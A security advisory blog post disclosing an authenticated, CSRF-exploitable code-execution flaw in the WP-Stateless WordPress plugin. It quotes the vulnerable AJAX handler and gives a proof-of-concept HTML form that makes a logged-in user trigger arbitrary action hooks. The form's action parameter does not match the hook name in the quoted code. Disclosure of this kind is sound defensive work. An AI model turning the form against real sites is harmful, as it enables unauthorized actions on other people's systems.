16 Jan

Our Proactive Monitoring Caught an Authenticated Remote Code Execution (RCE) Vulnerability in WP-Stateless

One of the ways we help to improve the security of WordPress plugins, not just for our customers, but for everyone using them, is the proactive monitoring of changes made to plugins in the Plugin Directory to try to catch serious vulnerabilities. Through a recently added improvement to that we continue to find more remote code execution (RCE) related vulnerabilities, which isn’t a great sign about the security of WordPress plugins. This time it led to us finding an authenticated variant, which can also be exploited through cross-site request forgery (CSRF), which has been in the plugin WP-Stateless for six months.

Since our Plugin Security Checker utilizes the same checks, it will alert you if plugins you use possibly contain the same type vulnerable code (and possibly contain more serious vulnerable code). From there if you are a paying customer of our service you can suggest/vote for it to receive a security review that will check over that or you can order the same type of review separately.

Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that since a previously full disclosed vulnerability was quickly on hackers’ radar, but it appears those moderators have such disdain for the rest of the WordPress community that their continued ability to act inappropriate is more important that what is best for the rest of the community.

Technical Details

In the file /lib/classes/class-errors.php the function stateless_notice_button_action() is made accessible to anyone logged in to WordPress through its AJAX functionality:

89
add_action( 'wp_ajax_stateless_notice_button_action', array( $this, 'stateless_notice_button_action' ) );

That function passes the value of the POST input “key” to the WordPress function do_action(), which will “execute functions hooked on a specific action hook”:

261
262
263
264
265
266
267
268
269
270
271
272
public function stateless_notice_button_action(){
	$response = array(
	  'success' => '1',
	);
	$error = false;
 
	if( empty($_POST['key']) ) {
	  $response['success'] = '0';
	  $response['error'] = __( 'Invalid key', $this->domain );
	}
 
	do_action($_POST['key']);

Proof of Concept

The following proof of concept will cause the WordPress action/function do_feed_rss to run, when logged in to WordPress.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=button_action" method="POST">
<input type="hidden" name="key" value="do_feed_rss" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service you can suggest/vote for the plugins you use to receive a security review from us. You can start using the service for free when you sign up now.

Leave a Reply

Your email address will not be published. Required fields are marked *